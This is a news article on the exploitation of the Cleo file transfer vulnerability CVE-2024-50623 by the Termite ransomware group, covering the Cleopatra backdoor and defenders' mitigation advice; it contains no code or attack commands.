A recently discovered zero-day flaw in the Cleo managed file transfer tool has set off a chain of events that are expected to lead to a surge in ransomware attacks. The exploit, known as CVE-2024-50623, allows for remote code execution (RCE) and affects various Cleo products, including Cleo Harmony, Cleo VLTrader, and Cleo LexiCon.
According to the company’s security advisory, the vulnerability was not adequately patched, leading to its exploitation by cybercriminals. This, in turn, has prompted a group known as “Termite” to launch a ransomware campaign targeting Cleo clients. The attacks began on Dec. 3, with at least 10 organizations already compromised, including businesses in the trucking, shipping, and food industries. With over 4,000 customers, mostly mid-sized organizations, Cleo is facing a significant threat.
The Termite group has been linked to previous cyberattacks against companies like Blue Yonder, which had far-reaching impacts felt by major brands like Starbucks. Analysts from Artic Wolf are now warning that the ransomware attacks targeting Cleo systems are likely to intensify in the coming days.
Following the success of a ransomware attack against MOVEit, a similar file transfer service, threat actors have realized the potential of exploiting vulnerabilities in managed file transfer solutions. The public disclosure of a proof-of-concept exploit for the Cleo zero-day on Dec. 11 has only fueled concerns about the widespread implications of this security flaw.
Patching the zero-day has proven to be challenging for Cleo customers, further exacerbating the situation. Despite initial attempts to address the issue in a previous software update, ongoing compromises prompted the release of another security patch. However, the lack of a new CVE designation for the exploit has raised doubts about the effectiveness of the remediation efforts.
As the security landscape evolves, organizations must be vigilant in detecting and responding to potential compromises. Artic Wolf researchers have identified a malicious PowerShell stager that leads to the deployment of a new Java-based backdoor called “Cleopatra.” This backdoor is designed to access data within Cleo MFT software, highlighting the need for proactive monitoring and security measures.
Defenders are advised to focus on monitoring server assets for suspicious activity, such as PowerShell commands, and to regularly audit devices for vulnerabilities in internet-accessible services. By implementing IP access control lists and keeping critical applications behind a VPN, organizations can reduce their exposure to mass exploitation campaigns like the one targeting Cleo systems.
In conclusion, the escalating ransomware campaign against Cleo underscores the importance of robust cybersecurity practices and timely threat detection. Organizations must remain vigilant and proactive in safeguarding their systems against evolving cyber threats.